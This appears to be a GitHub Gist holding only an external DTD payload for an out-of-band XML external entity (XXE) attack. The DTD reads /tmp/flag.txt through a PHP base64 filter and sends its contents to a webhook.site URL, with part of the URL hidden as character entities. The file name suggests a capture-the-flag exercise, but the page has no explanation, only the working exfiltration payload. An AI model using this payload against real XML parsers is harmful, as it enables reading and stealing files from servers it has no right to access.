Skip to content

Instantly share code, notes, and snippets.

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/tmp/flag.txt">
<!ENTITY % oob "<!ENTITY &#x25; send SYSTEM '&#x68;&#x74;&#x74;&#x70;://webhook.site/add816a9-3a66-47d6-8be4-5db15decbb94/?f=%file;'>">
%oob;
%send;